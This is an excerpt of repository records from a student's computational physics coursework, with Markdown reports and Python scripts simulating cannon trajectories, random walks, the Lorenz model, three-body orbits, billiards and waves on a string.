title=\"$$\\frac{dv_y}{dt}=-g$$\" /></a>\nWe can use Euler method to solve the problem.Then we add air resistance, air density,temperature,gravitational acceleration etc to the model to approach the realistic motion of the cannon and find out how much these factors affect the model.\n\n1.We will assume that the magnitude of the drag force on cannon shell is give by \n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$F_{drag}=-B_2v^2$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$F_{drag}=-B_2v^2$$\" title=\"$$F_{drag}=-B_2v^2$$\" /></a>\nwhere<a href=\"http://www.codecogs.com/eqnedit.php?latex=$v=\\sqrt{&space;v_x^2&plus;v_y^2}$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$v=\\sqrt{&space;v_x^2&plus;v_y^2}$\" title=\"$v=\\sqrt{ v_x^2+v_y^2}$\" /></a>is the speed of the shell.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$F_{drag,x}=-B_2vv_x$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$F_{drag,x}=-B_2vv_x$$\" title=\"$$F_{drag,x}=-B_2vv_x$$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$F_{drag,y}=-B_2vv_y$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$F_{drag,y}=-B_2vv_y$$\" title=\"$$F_{drag,y}=-B_2vv_y$$\" /></a>\n2.Air resistance is propotional to the density of the air,so the drag force at high altitude will be less.Treat the atmosphere as an adiabatic ideal gas which leads to that the density depends on altitude according to\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\rho=\\rho_0(1-\\frac{ay}{T_0})^\\alpha$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\rho=\\rho_0(1-\\frac{ay}{T_0})^\\alpha$$\" title=\"$$\\rho=\\rho_0(1-\\frac{ay}{T_0})^\\alpha$$\" /></a>\nWe replace <a href=\"http://www.codecogs.com/eqnedit.php?latex=$B_2$with$B_2\\rho/\\rho_0$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$B_2$with$B_2\\rho/\\rho_0$\" title=\"$B_2$with$B_2\\rho/\\rho_0$\" /></a>.\n$a\\approx6.5\\times{10^-}^3$K/m,$T_0$is the sea level temperature,$\\alpha\\approx2.5$for air\n\n3.Further incorporate the effects off the variation of the ground temperature by replacing<a href=\"http://www.codecogs.com/eqnedit.php?latex=$B_2$by$B_2^{ref}(T_0/T_{ref})^\\alpha$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$B_2$by$B_2^{ref}(T_0/T_{ref})^\\alpha$\" title=\"$B_2$by$B_2^{ref}(T_0/T_{ref})^\\alpha$\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$T_{ref}=300K$,$B_2^{ref}/m=4\\times10^{-5}m^{-1}$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$T_{ref}=300K$,$B_2^{ref}/m=4\\times10^{-5}m^{-1}$\" title=\"$T_{ref}=300K$,$B_2^{ref}/m=4\\times10^{-5}m^{-1}$\" /></a>\n\n4.Gravity decreases with altitude as one rises above the Earth's surface because greater altitude means greater distance from the Earth's centre.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$g_h=g_0(\\frac{r_e}{r_e&plus;h})^2$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$g_h=g_0(\\frac{r_e}{r_e&plus;h})^2$$\" title=\"$$g_h=g_0(\\frac{r_e}{r_e+h})^2$$\" /></a>\nWhere\n\ngh is the gravitational acceleration at height h above sea level.\nre is the Earth's mean radius.\ng0 is the standard gravitational acceleration.\nThe formula treats the Earth as a perfect sphere with a radially symmetric distribution of mass; a more accurate mathematical treatment is discussed below(from wikipedia).\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch2.py)\n--------------------\n## Results and Analysis\n----------\n\n**1.Use the adiabatic model of air density**\n - when we ignore the air resistance. \n![Fig2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/2-2.png)\n - when we consider the air resistance and air density.\n ![Fig1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/2-1.png)\nWhen we consider air resistance,the trajectories change a lot.\nThe altitude the cannon can reach fall. \nCompare these two pic,we can see cannon's range reduce a lot .\n> - ignore air resistance\n![FIG](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/2-1range.png)\n 45.0 50049.491150831855\n> - cosider air densitr\n![fig4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/2-2range.png)\n43.199999999999996 24523.790443161008\n( numbers under the plot are the maximum range and the launch angle to achieve it.)\n---------------------\n\nThe maximum range reduce from 50049.49 to 24523.79(about51.0%)\nThe launch angle to achieve it also become smaller(from 45.0 to 43.2)\n\n\n----------\n\n\n**2.Incorporate the effects of the temperature**\n> - 253K\n ![Fig5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/253.png)\n> - 303K\n![FIg6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/303.png)\nAssume that the temperature in winter is 253K and the summer temperature is 303K.\nThe altitude the cannon can reach fall in summer .\nCompare these two pic,we can see cannon's range reduce .\n> - 253K\n ![FIG7](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/253range.png)\n > - 303K\n ![fig8](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/303range.png)\n( numbers under the plot are the maximum range and the launch angle to achieve it.)\n-----------------------\n\nThe maximum range reduce from30320.25to 24194.66 in summer.(about20.2%).However,both range in winter and summer fall a lot compared with 300K.\nThe launch angle to achieve it in winter is 43.2 which is closed to reference temperature.The angle in summer is 45.0 which is closed to the ideal condition.\n\n\n**3.Incorporate the effects of g**\n> - g\n![Fig9](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/g.png)\n> - gh\n![fig10](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/gh.png)\n> - g\n![fig11](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/g%20range.png)\n> - gh\n![fig12](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/gh%20range.png).\n---------------------------------\n\nIt seems that g has very little effect on the trajectory.\n\n--------\nPS.pygame\n已安装pygame\n\nimport pygame \nfrom pygame.locals import * \npygame.init() \npygame.display.set_mode((600,500)) 一直报错...(I'm still working on it!)\n\n\n" }, { "alpha_fraction": 0.6842184066772461, "alphanum_fraction": 0.767899751663208, "avg_line_length": 54.858333587646484, "blob_id": "6549f5606ca33ec91f59f444d826254519afa02f", "content_id": "d18645b814759735fc410b5b941205030e4d058a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6714, "license_type": "no_license", "max_line_length": 610, "num_lines": 120, "path": "/final/Random Systems.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# Random Systems\n\nName:贾雪巍 \n\nStudent number:201530120090\n\n## Random Walks&Diffusion\n\n1.Random walk is a model describes a process in which a walker moves one step a time,according to certain rules.The simplest situation involves a walker that is able to take steps of length unity along a line.The walker begins at the origin.Each step can be towards right or left with equal probability.We can stimulate the displacement of the walker after N steps(time).Use the Monte Carlo sampling.First generate a random number between 0 and 1 and determine the direction of the step.We can also calculate the mean displacement and the average of square of the displacement and the 2 or 3 dimensional cases.\n\n2.Random walks are equivalent to diffusion.Consider the density of particles(walkers).The density is propotional to the probablity per unit volume P(x,y,z,t).We'll see the density and P obey the same equation.On a simple cubic lattice,the total probablity to arrive at (i,j,k) is P(i,j,k,n)=1/6[P(i+1,j,k,n-1)+P(i,j,k,t)+P(i-1,j,k,n-1)+P(i,j+1,k,n-1)+P(i,j-1,k,n-1)+P(i,j,k-1,n-1)].Rearranging and taking the continuum limit, it suggests that\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{\\partial&space;P(x,y,z,t)}{\\partial&space;t}=D&space;\\nabla^2P(x,y,z,t)\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{\\partial&space;P(x,y,z,t)}{\\partial&space;t}=D&space;\\nabla^2P(x,y,z,t)\" title=\"\\frac{\\partial P(x,y,z,t)}{\\partial t}=D \\nabla^2P(x,y,z,t)\" /></a>\n\nIf we know the initial distribution we'll get the solution at future times.\n\n3. Recall that the statistical definition of entropy is \n\n <a href=\"http://www.codecogs.com/eqnedit.php?latex=S=-\\sum_{i}P_ilnP_i\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?S=-\\sum_{i}P_ilnP_i\" title=\"S=-\\sum_{i}P_ilnP_i\" /></a>\n\n Divide the system into a square grid.State i correspond to the particles in the cell i at any particular time and Pi is the probability of finding the particle in this cell at particular time.\n\n## [Codes](https://github.com/jxw666/computationalphysics_N2015301020090/tree/master/final)\n\n## Results&Anylasis\n\n 1.One dimensional random walk\n\n ![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/1.png)\n\nHere I draw two walker's displacements versus time\n\nThe following figures are get from the average of 5000 walkers.\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/2.png)\n\nWe can see that the mean displacement is close to zero as expected.Because it's equal likely to go left and right.\n\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/3.png)\n\nWe see that the averages of the square of the displacement is well described by a straight line.The RED line is the stimulation of the dots.Y=0.989960976898X+0.315882666666.\n\nFor a free particle x=vt.So a random walker escapes from the origin more slowly(square root of t).\n\nN steps one dimensional random walk is a **Binomial distribution.** From the math we have learned we can easily know that\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\sigma_n^2=\\overline{(\\Delta&space;n)^2}=Npq\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\sigma_n^2=\\overline{(\\Delta&space;n)^2}=Npq\" title=\"\\sigma_n^2=\\overline{(\\Delta n)^2}=Npq\" /></a>\n\nOur textbook,to explain this result,suggests that we can write the position xn as a sum of n separate i th step,then write the square displacement.Finally we reach that the slope of the curve is 1.\n\nUse the same method the average of x^4 is\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=<x^4>=3n^2-2n\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?<x^4>=3n^2-2n\" title=\"<x^4>=3n^2-2n\" /></a>\n\nhere's the result I got\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/4.png)\n\n\n\n​\t\t\t\n​\t\tThe RED line is y=2.94218790678x^2 -6.59728183121x+ 63.7786218824 .I think <x4> can be very large (we can see from the figure).So the difference between the ideal one and the result I got is acceptable.\n\n2.one dimensional but random length\n\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/5.png)\n\n![6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/6.png)\n\nThe mean average is also close to zero.\n\n![7](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/7.png)\n\nThe RED line is y=0.346211421082x -0.0849232487711\n\n![8](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/8.png)\n\nThe RED line is y=2.94218790678x^2 -6.59728183121x+ 63.7786218824\n\n3.two&three dimensions\n\n![9](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/9.png)\n\n![10](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/10.png)\n\nThe stimulation result is y=1.01732169697x+0.22355830303\n\n![11](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/11.png)\n\n\n\n![12](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/12.png)\n\nThe stimulation result is y=1.62234589019 x-0.981333454546\n\n4.From the **central limit theorem** we know for large number particles their distributions should approximate to a Gaussian distribution.You can also verify that a Gaussian distribution obeys the diffusion equation.\n\nSet all particle at the center at the beginning, then let them do random walk in one dimension .For 1000 walkers after 10,100,500,2000,4000,8000 time steps we get\n\n![13](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/13.png)\n\nWe can see how the particles diffuse in this way without knowing the details of particles' motion.\n\n5.Consider two dimension random walk problem. First we set a number of particle in the center area which is shaped as a square. Then let them do random walk to up,down,left and right in four directions. The only limit is once they are reach the edge of the area they can not pass it. Then we observe the whole random particle picture in different time.\n\n![14](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/14.png)\n\nThen calculate the entropy we get\n\n![entropy](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/entropy.png)\n\nDuring the process th entropy increase and seemingly is going to approach a constant value.This illustrates how a closed system approaches equilibrium.\n\n## Acknowledgement\n\n1.Qiangyu,a former student of our computational course.I refered part of his codes,especially about the diffusion problem.\n\n2.Wikipedia,Random walk\n\n3.Computational Physics, Nicholas J. Giordano & Hisao Nakanishi \n" }, { "alpha_fraction": 0.39834025502204895, "alphanum_fraction": 0.4655601680278778, "avg_line_length": 23.5744686126709, "blob_id": "f9b29d00ffadad6b7b4b6257503ec5d9362c13d3", "content_id": "cdcac31fa3dbef2889211b70fec1ddb47676cecd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1239, "license_type": "no_license", "max_line_length": 42, "num_lines": 47, "path": "/homework8/code/a=0.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\ndef billiard(x0,y0,vx0,vy0,r,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n t=[0]\n dt=0.01\n T=0\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n t.append(t[-1]+dt)\n if (x[-1]**2+y[-1]**2)>r**2:\n d=math.sqrt(x[-1]**2+y[-1]**2)\n d1=2*r-d##这里借鉴了强雨的代码,对坐标进行修正\n x.append(x[-1]*d1/d)\n y.append(y[-1]*d1/d)\n t.append(t[-1]+dt)\n cs=x[-1]/d \n ss=y[-1]/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n T=t[-1]\n return x,y\ndef circle(r1):\n x1=[]\n y1=[]\n theta=[]\n theta.append(0)\n tu=2*math.pi/10000\n for j in range(10000):\n x1.append(r1*math.cos(theta[-1]))\n y1.append(r1*math.sin(theta[-1]))\n theta.append(theta[-1]+tu)\n return x1,y1\nfig = plt.figure(figsize=(7, 7))\nB=billiard(0.5,0.5,-0.4,-0.3,1,500)\nplt.plot(B[0],B[1],'k:')\na1,b1=circle(1.0)\nplt.plot(a1,b1,color='black') \nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('Circular stadium-trajectory')\n \n \n \n \n \n " }, { "alpha_fraction": 0.4588682949542999, "alphanum_fraction": 0.5306704640388489, "avg_line_length": 32.39682388305664, "blob_id": "02afbb6a89400f40d047229a60d94e954b6049f8", "content_id": "82ef12ad58c97f0d2f2541f04629361647385dff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 197, "num_lines": 63, "path": "/ch4/ch4.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\nMS=2*10**30\nMJ=1.9*10**27*10\nME=6*10**24\na=(6*10**24+5.2*1.9*10**27)/(2*10**30+6*10**24+1.9*10**27)\nb=((1-a)*2*math.pi*6*10**24+1.9*10**27*2*math.pi*(5.2-a)/math.sqrt(5.2))/(2*10**30*a)\nc=(2*math.pi*ME+2*math.pi*MJ/math.sqrt(5.2))/(ME+MS+MJ)\nJX=[5.2-a]\nEX=[1-a]\nSX=[0-a]\nJY=[0]\nEY=[0]\nSY=[0]\nCOMX=[0]\nCOMY=[0]\nvex=0\nvey=2*math.pi\nvjx=0\nvjy=2*math.pi/math.sqrt(5.2)\nvsx=0\nvsy=0\nt=0\ndt=0.01\ni=0\nwhile t<=100:\n re_s=math.sqrt((EX[i]-SX[i])**2+(EY[i]-SY[i])**2)\n re_j=math.sqrt((EX[i]-JX[i])**2+(EY[i]-JY[i])**2)\n rs_j=math.sqrt((SX[i]-JX[i])**2+(SY[i]-JY[i])**2)\n vex_dt=vex-(4*math.pi**2*(EX[i]-SX[i])/re_s**3-4*math.pi**2*(MJ/MS)*(EX[i]-JX[i])/re_j**3)*dt\n vey_dt=vey-(4*math.pi**2*(EY[i]-SY[i])/re_s**3-4*math.pi**2*(MJ/MS)*(EY[i]-JY[i])/re_j**3)*dt\n vjx_dt=vjx-(4*math.pi**2*(JX[i]-SX[i])/rs_j**3-4*math.pi**2*(ME/MS)*(JX[i]-EX[i])/re_j**3)*dt \n vjy_dt=vjy-(4*math.pi**2*(JY[i]-SY[i])/rs_j**3-4*math.pi**2*(ME/MS)*(JY[i]-EY[i])/re_j**3)*dt \n vsx_dt=vsx-(4*math.pi**2*(ME/MS)*(SX[i]-EX[i])/re_s**3-4*math.pi**2*(MJ/MS)*(SX[i]-JX[i])/rs_j**3)*dt \n vsy_dt=vsy-(4*math.pi**2*(ME/MS)*(SY[i]-EY[i])/re_s**3-4*math.pi**2*(MJ/MS)*(SY[i]-JY[i])/rs_j**3)*dt \n COMX.append(0)\n COMY.append(COMY[i]+c*dt)\n EX.append(EX[i]+vex_dt*dt)\n EY.append(EY[i]+vey_dt*dt-c*dt)\n JX.append(JX[i]+vjx_dt*dt)\n JY.append(JY[i]+vjy_dt*dt-c*dt)\n SX.append(SX[i]+vsx_dt*dt)\n SY.append(SY[i]+vsy_dt*dt-c*dt) \n\n vex=vex_dt\n vey=vey_dt\n vsx=vsx_dt\n vsy=vsy_dt\n vjx=vjx_dt\n vjy=vjy_dt\n i=i+1\n t=t+dt\nfig = plt.figure(figsize=(7, 7)) \nplt.plot(EX,EY,linewidth='0.1',color='blue',label='Earth')\nplt.plot(SX,SY,linewidth='1',color='red',label='Sun')\nplt.plot(JX,JY,linewidth='1',color='black',label='Jupiter')\n#plt.plot(COMX,COMY,color='yellow',linewidth='2')\n#plt.grid()\nplt.xlabel('x/AU')\nplt.ylabel('y/AU')\nplt.title('3-body simulation Earth&Jupiter&Sun')\nplt.legend()\nplt.show()" }, { "alpha_fraction": 0.4736328125, "alphanum_fraction": 0.5751953125, "avg_line_length": 21.755556106567383, "blob_id": "c9902a0a56d361576f0ee14b3c60418b6ca68a28", "content_id": "4b457c6d126d9db638401326971e68553339bd46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1024, "license_type": "no_license", "max_line_length": 70, "num_lines": 45, "path": "/ch6/ch6.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport numpy as np\nimport matplotlib.pyplot as plt\ndelta_x=0.01\nc=300\ndelta_t=3.5*10**(-5)#delta_x/c#2*10**(-5)#3.33*10**(-5)delta_x/c\nr=c*delta_t/delta_x\nx=np.linspace(0,1,int(1/delta_x)+1)\nk0,x0=1000,0.3\ny_initial=[]\nfor i in range(1+int(1/delta_x)):\n y_initial.append(math.exp(-k0*(i*delta_x-x0)**2))\ny1=y_initial\ny2=y_initial\nfor i in range(11):\n y3=[0]\n for j in range(1,len(y2)-1):\n y3.append((2*(1-r**2)*y2[j]-y1[j]+r**2*(y2[j-1]+y2[j+1])))\n y3.append(0)\n y1=y2\n y2=y3\n\n\nn_step=11\nn_plot=11\nplt.figure(figsize=(10,10))\nplt.subplot(n_plot,1,1)\nplt.plot(x,y_initial,color='blue')\nplt.title('Waves On A String With Fixed Ends')\nfor i in range(n_plot-1):\n plt.subplot(n_plot,1,i+2)\n plt.plot(x,y1,color='blue')\n #plt.xlabel('x')\n #plt.figure(figsize=(7, 7))\n for i in range(11):\n y3=[0]\n for j in range(1,len(y2)-1):\n y3.append((2*(1-r**2)*y2[j]-y1[j]+r**2*(y2[j-1]+y2[j+1])))\n y3.append(0)\n y1=y2\n y2=y3\n\n \n\nplt.show()\n" }, { "alpha_fraction": 0.668713390827179, "alphanum_fraction": 0.7446274161338806, "avg_line_length": 78.62222290039062, "blob_id": "c05d9ea44c7a9a0f3c74623d58fcae50417dd814", "content_id": "352c4dd7ed2f45f89400cb2773473df630a368bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3585, "license_type": "no_license", "max_line_length": 699, "num_lines": 45, "path": "/Ch3/lorenz.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\n\n\n> Written with [StackEdit](https://stackedit.io/).\n# Chapter_two_section3.6-The Lorenz Model\n-------------\nproblem3.26&27\n\n--------\n## Background\n-------\n\nE.N.Lorenz atmospheric scientist(not Lorentz!) studied the Navier-Stokes equations and the Rayleigh-Benard problem,which concerns a fluid in a container whose top and bottom surfaces are held at different temperatures.It had long been know that as the difference between these two temperature is increased, the fluid can undergo transitions from a stationary state to steady flow to chaotic flow.He considered a **greatly simplified** version of Navier-Stokes equationas as applied to this particular problem.He grossly oversimplified the problem as he reduced it to only three equations\n <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{dx}{dt}=\\sigma(y-x)\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{dx}{dt}=\\sigma(y-x)\" title=\"\\frac{dx}{dt}=\\sigma(y-x)\" /></a>,\n <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{dy}{dt}=-xz&plus;rx-y\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{dy}{dt}=-xz&plus;rx-y\" title=\"\\frac{dy}{dt}=-xz+rx-y\" /></a>,\n <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{dz}{dt}=xy-bz\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{dz}{dt}=xy-bz\" title=\"\\frac{dz}{dt}=xy-bz\" /></a>.\n x,y,z are derived from the temperature density and velocity variables from Rayleigh-Benard problem,and the sigma, r,b are the measures of of temperature difference and other fluid parameters. In the following analysis,we'll take<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\sigma=10,b=8/3\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\sigma=10,b=8/3\" title=\"\\sigma=10,b=8/3\" /></a>.From our text book we know the transition from steady convection to chaotic behavior takes place at<a href=\"http://www.codecogs.com/eqnedit.php?latex=r=470/19\\approx24.74\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?r=470/19\\approx24.74\" title=\"r=470/19\\approx24.74\" /></a>.\n We again use Euler method to solve this problem.\n\n\n-------\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/lorenz.py)\n-----\n## Results&Analysis\n-------------\n1.Phase-space\nConstruct a phase-space plot model for the Lorenz model.Imagine that x,y and z are coordinates in some abstract space.\nr=2, steady\n![r=2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D2.png)\n![r=10](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D10.png)\n![r=15](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D15.png)\n![r=20](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D20.png)\n![r=30](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D30.png)\n![r=50](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D50.png)\n![r=100](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/r%3D100.png)\nWhen r is small,the system is steady.When r=20,the system is chaotic,not r=25.However,when r is greater,the chaos seems to disappear???\n\n-----------\n2.Poincatr sections\nConsider the two-dimensional slices\nx(0)=1,y(0)=z(0)=0\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/poin1.png)\nx(0)=0,y(0)=z(0)=1\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/poin2.png)\nPoincare sections are independent of the initial conditions.\n" }, { "alpha_fraction": 0.7202531695365906, "alphanum_fraction": 0.7943037748336792, "avg_line_length": 59.57692337036133, "blob_id": "d18c22a78ee6b87aff2ec5f968defa01fa0bdc26", "content_id": "a09f31e0725ec942e840909cb1559e48fa29fb41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1580, "license_type": "no_license", "max_line_length": 692, "num_lines": 26, "path": "/CH5/Electric Potentials .md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# Electric Potentials \n\nProblem 5.3\n\n## Bacground\n\nThe reigons of space that do not contain any electric charges,the potential obeys Laplace's equation(PDE).We'll use the **relaxation method** to solve the equation numerically.After the approximaton we get the value of the potential at any point is the average of potential at all of the neighbor points(assume that the step sizes along every axis are equal).If we know the value at boundaries ,we make an initial guess for the solution.Then calculate an improved guess by the relation we get.Then repeat the procedure.This iterative process continues until satisfy some conditions.This approach is called the relaxation method.The algorithm ,our textbook says, is known as the Jacobi method.\n\nProblem5.3consider the potential between two parallel capacitor plates.And based on the symmetry ,we just need to calculate the result in one quadrant of the x-y plane.\n\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/1.png)\n\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/ch5.py)\n\n## Results&Analysis\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/2.png)\n\n![2'](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/2'.png)\n\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/3.png)\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/4.png)\n## Acknowlegement\n\nI want to thank Junyi Shangguan.Her method to set the potential is awesome!\n\n\n\n\n\n" }, { "alpha_fraction": 0.417391300201416, "alphanum_fraction": 0.8695651888847351, "avg_line_length": 115, "blob_id": "e4bebe5f25583e51534e1afb9c26a40de77dc7fb", "content_id": "b4faa873598649e2f845955c23342ce48a1a94ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 115, "license_type": "no_license", "max_line_length": 115, "num_lines": 1, "path": "/Untitled.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "![7b87cc188618367a5954ce8b26738bd4b11ce5db](/Users/apple/Desktop/7b87cc188618367a5954ce8b26738bd4b11ce5db.jpg)![]()" }, { "alpha_fraction": 0.44592517614364624, "alphanum_fraction": 0.5146079063415527, "avg_line_length": 23.94871711730957, "blob_id": "b0bf9b068821c67032d371a708ebff855742a64c", "content_id": "f66890979535623f9092aaadddab6d6ee31053ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1961, "license_type": "no_license", "max_line_length": 57, "num_lines": 78, "path": "/final/3-randomwalk.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.integrate import odeint\nfrom mpl_toolkits.mplot3d import Axes3D\ndef randpath(T):\n x=[0]\n y=[0]\n z=[0]\n t=[0]\n r2ave=[0]*T\n for i in range(T):\n ruler=random.randint(1,3)\n if ruler==1:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n x.append(x[-1]+1) \n else:\n x.append(x[-1]-1)\n y.append(y[-1])\n z.append(z[-1])\n if ruler==2:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n y.append(y[-1]+1)\n else:\n y.append(y[-1]-1)\n x.append(x[-1])\n z.append(z[-1])\n if ruler==3:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n z.append(y[-1]+1)\n else:\n z.append(y[-1]-1)\n x.append(x[-1])\n y.append(z[-1]) \n r2ave[i]=r2ave[i]+(x[-1]**2+y[-1]**2+z[-1]**2) \n return x,y,z,t,r2ave\nx,y,z,t,r2ave=randpath(500)\nx1,y1,z1,t1,r2ave1=randpath(500)\nfig = plt.figure(figsize=(9,7))\nax1=fig.gca(projection='3d')\nax1.plot(x1,y1,z1,color='black')\nax1.plot(x,y,z,color='blue')\nax1.set_title('random walk in 3 dimension')\nax1.set_xlabel('x')\nax1.set_ylabel('y')\nax1.set_zlabel('z')\n#ax1.view_init(30,0)\n\n\n#-----------\nr2ave=[0]*100\nfor i in range(5000):\n x1,y1,z1,t1,r2ave1=randpath(100)\n for j in range(len(x1)-1):\n r2ave[j]=r2ave[j]+r2ave1[j]/5000\nplt.figure(figsize=(10,5))\nplt.grid()\nt0=[]\nfor i in range(100):\n t0.append(i+1)\nplt.plot(t0,r2ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('<r2>')\nplt.title('random walk in one dimension')\n#plt.text(10,80,'<x2> versus time')\nk,b=np.polyfit(t0,r2ave,1)#多项式拟合\nideal=[]\nfor i in range(100):\n ideal.append(k*(i+1)+b)\nplt.plot(t0,ideal,color='red')\nprint(k,b)\n\n " }, { "alpha_fraction": 0.32249894738197327, "alphanum_fraction": 0.37990713119506836, "avg_line_length": 25.65517234802246, "blob_id": "394b5f8dd4803d51cd8d8933a91f1429c0c74d64", "content_id": "f53ed76437a6f2eb92f95b1cf0fc7329b4351857", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2369, "license_type": "no_license", "max_line_length": 91, "num_lines": 87, "path": "/homework8/code/phasespace2.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\ndef billiard(x0,y0,vx0,vy0,r,a, RR,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n t=[0]\n dt=0.01\n T=0\n VX=[vx]\n while T<=time:\n 